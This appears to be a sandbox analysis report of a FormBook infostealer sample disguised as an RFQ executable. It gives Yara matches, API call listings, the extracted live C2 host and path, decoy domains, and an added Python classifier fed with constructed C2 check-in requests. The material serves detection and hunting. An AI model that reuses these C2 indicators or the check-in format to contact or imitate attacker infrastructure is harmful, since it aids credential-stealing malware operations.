Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lunr.js/0.7.2/lunr.min.js
Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css
Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmp | String found in binary or memory: https://opensource.keycdn.com/fontawesome/4.7.0/font-awesome.min.css
Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe | Code function: 2_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
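
The configuration in the Malware Configuration section and the HTTP rows above fit together: every check-in uses the same path (/um8e/) and the same two-parameter query shape, carries no User-Agent and closes the connection, and only one of the hosts (www.jiltedowl.com, the single "C2 list" entry) is the live controller; the others are taken from the "decoy" list. The following is an added example, not the sandbox's or Snort's own logic, of a classifier that joins the two: it parses raw requests, looks the host up in the extracted configuration, and records which shape features matched. The configuration excerpt is copied from this page (C2 path plus a few of the decoys seen in traffic), the three request strings are constructed in the shape of the rows above (the third is a benign control that is not from the report), and the "two-parameter query" feature is an assumption drawn from this sample's traffic rather than a documented FormBook constant.

```python
import json
from urllib.parse import parse_qs, urlsplit

# Excerpt of the configuration the extractor recovered from this sample: the
# single live C2 path and a few of the decoy domains that appear in the traffic
# above. The full list on this page has many more decoys.
CONFIG = json.loads("""{
  "C2 list": ["www.jiltedowl.com/um8e/"],
  "decoy": ["slingshotart.com", "venturivasiljevic.com", "helpushelpothersstore.com",
            "vicdux.life", "lippocaritahotel.com", "sitedesing.com",
            "themiamadison.com", "influenced-brands.com"]
}""")

# Constructed raw requests in the shape of the 'HTTP traffic detected' rows:
# request line, Host, Connection: close, no User-Agent. The third is a benign
# control request that is not from the report.
REQUESTS = [
    "GET /um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4"
    "&z6AhC6=4h0836-hg HTTP/1.1\r\nHost: www.jiltedowl.com\r\nConnection: close\r\n\r\n",
    "GET /um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB"
    "&z6AhC6=4h0836-hg HTTP/1.1\r\nHost: www.sitedesing.com\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.org\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query dict and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "path": parts.path,
            "query": parse_qs(parts.query, keep_blank_values=True),
            "headers": headers, "host": headers.get("host", "").lower()}


def load_config(config: dict):
    """C2 entries are 'host/path'; decoys are bare domains."""
    c2 = {}
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        c2[host.lower()] = "/" + path
    decoys = {d.lower() for d in config["decoy"]}
    return c2, decoys


def strip_www(host: str) -> str:
    return host[4:] if host.startswith("www.") else host


def classify(raw: str, config: dict = CONFIG) -> dict:
    """Label a request c2 / decoy / suspicious / benign and list the shape
    features that matched. A decoy hit is evidence of infection on the client,
    not of attacker infrastructure: decoy domains are unrelated third parties."""
    c2, decoys = load_config(config)
    req = parse_request(raw)
    reasons = []
    if "user-agent" not in req["headers"]:
        reasons.append("no User-Agent")
    if req["headers"].get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if len(req["query"]) == 2:   # two opaque parameters, as in this sample's traffic (assumed shape)
        reasons.append("two-parameter query")
    if req["host"] in c2 and req["path"] == c2[req["host"]]:
        verdict = "c2"
    elif strip_www(req["host"]) in decoys and req["path"] in c2.values():
        verdict = "decoy"
    elif len(reasons) == 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"host": req["host"], "path": req["path"], "verdict": verdict, "reasons": reasons}


if __name__ == "__main__":
    for raw in REQUESTS:
        r = classify(raw)
        print(f"{r['verdict']:<10} {r['host']}{r['path']}  {', '.join(r['reasons'])}")
```

When turning this into blocking or hunting rules, block or hunt on the C2 entry (host plus path, and the 104.252.53.222 address the Snort alerts attribute to it) and treat decoy contacts as host-level indicators only; the 404 from nginx above is what a decoy legitimately answers, and adding those domains to a blocklist would only break unrelated sites.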

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_0041826D NtReadFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_004182EB NtClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BBB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BBA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BBAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9560 NtWriteFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BBA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BBA770 NtOpenThread,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_2_00BB9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_1_0041826D NtReadFile,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_1_004182EB NtClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 3_1_0041839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_04BC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_001381C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_00138270 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_001382F0 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_001383A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_0013826D NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_001382EB NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 13_2_0013839A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: 2_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 04B8B150 appears 48 times
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: String function: 00B7B150 appears 136 times
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe, Code function: String function: 0041A0A0 appears 38 times
          Source: RFQ-BCM 03122020.exe, 00000002.00000003.252302485.00000000099B6000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ-BCM 03122020.exe
          Source: RFQ-BCM 03122020.exe, 00000003.00000002.305155213.0000000000A46000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs RFQ-BCM 03122020.exe
          Source: RFQ-BCM 03122020.exe, 00000003.00000002.305433553.0000000000DFF000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ-BCM 03122020.exe
          Source: RFQ-BCM 03122020.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
